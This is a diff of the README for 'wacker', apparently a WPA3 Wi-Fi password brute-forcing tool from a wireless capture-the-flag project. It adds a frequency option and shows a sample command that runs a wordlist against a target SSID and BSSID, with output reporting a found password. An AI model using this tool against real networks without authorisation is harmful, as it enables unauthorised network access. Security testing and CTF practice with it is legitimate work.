blunderbuss-wctf/wacker/README.md

                         interface to use
   --bssid BSSID         bssid of the target
+  --ssid SSID           the ssid of the WPA3 AP
+  --freq FREQ           frequency of the ap
-  --ssid SSID           the ssid of the WPA3 AP --start START_WORD    word to start with in the wordlist
+  --start START_WORD    word to start with in the wordlist
 ```
-With any luck... running the attack using just instance...
+With any luck... running the attack using just one instance...
 ```
-# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1
+# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
 Starting wpa_supplicant...
      5796 / 509152 words :  64.33 words/sec :  7824 secs to exhaust : word = Aeromechanics
 Found the password: 'Aeromechanics'